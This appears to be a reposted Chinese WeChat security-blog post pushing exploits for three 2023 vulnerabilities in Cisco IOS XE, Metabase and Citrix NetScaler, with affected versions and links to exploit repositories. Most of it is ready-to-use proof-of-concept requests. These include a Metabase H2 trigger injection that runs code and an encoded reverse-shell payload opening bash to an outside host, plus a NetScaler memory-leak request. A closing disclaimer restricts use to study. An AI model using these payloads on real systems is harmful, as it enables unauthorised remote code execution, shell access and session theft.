1、概述
本章主要描述以下CVE:
CVE-2023-20198:Cisco IOS XE Web UI 权限提升漏洞
CVE-2023-38646:Metabase 远程代码执行漏洞
CVE-2023-4966:Citrix NetScaler信息泄露漏洞
2、内容
① Cisco IOS XE Web UI 权限提升漏洞(CVE-2023-20198)
漏洞影响版本:
启用了 Web UI 功能的 Cisco IOS XE 设备
CVE-2023-20198漏洞扫描程序项目地址:
https://github.com/cert-orangecyberdefense/Cisco_CVE-2023-20198
② Metabase 远程代码执行漏洞(CVE-2023-38646)
漏洞影响版本:
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2
POC:
POST /api/setup/validate HTTP/1.1Host: localhostContent-Type: application/jsonContent-Length: 566{"token": "5491c003-41c2-482d-bab4-6e174aa1738c","details":{"is_on_demand": false,"is_full_sync": false,"is_sample": false,"cache_ttl": null,"refingerprint": false,"auto_run_queries": true,"schedules":{},"details":{"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()n$$--=x\;","advanced-options": false,"ssl": true},"name": "an-sec-research-team","engine": "h2"}}
获取反向shell的POC:
POST /api/setup/validate HTTP/1.1Host: localhostContent-Type: application/jsonContent-Length: 812{"token": "5491c003-41c2-482d-bab4-6e174aa1738c","details":{"is_on_demand": false,"is_full_sync": false,"is_sample": false,"cache_ttl": null,"refingerprint": false,"auto_run_queries": true,"schedules":{},"details":{"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')n$$--=x","advanced-options": false,"ssl": true},"name": "an-sec-research-team","engine": "h2"}}
CVE-2023-38646漏洞利用脚本项目地址:
https://github.com/birdm4nw/CVE-2023-38646
③ Citrix NetScaler信息泄露漏洞(CVE-2023-4966)
漏洞影响版本:
Citrix:NetScaler ADC 13.1-FIPS,
Citrix:NetScaler ADC 12.1-FIPS,
Citrix:NetScaler ADC 12.1-NDcPP,
Citrix:NetScaler ADC 和 NetScaler Gateway
POC:
GET /oauth/idp/.well-known/openid-configuration HTTP/1.1Host: a <repeated 24812 times>Connection: close
CVE-2023-4966漏洞利用脚本项目地址:
https://github.com/Chocapikk/CVE-2023-4966
以上具体脚本使用可查看项目地址,脚本安全性自查。
免责声明:
本公众号漏洞复现文章,SRC、渗透测试等文章,仅供学习参考,请勿用于实战!!有授权情况下除外!!由于传播、利用本公众号文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责
原文始发于微信公众号(sahx安全从业记):CVE利用推送
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论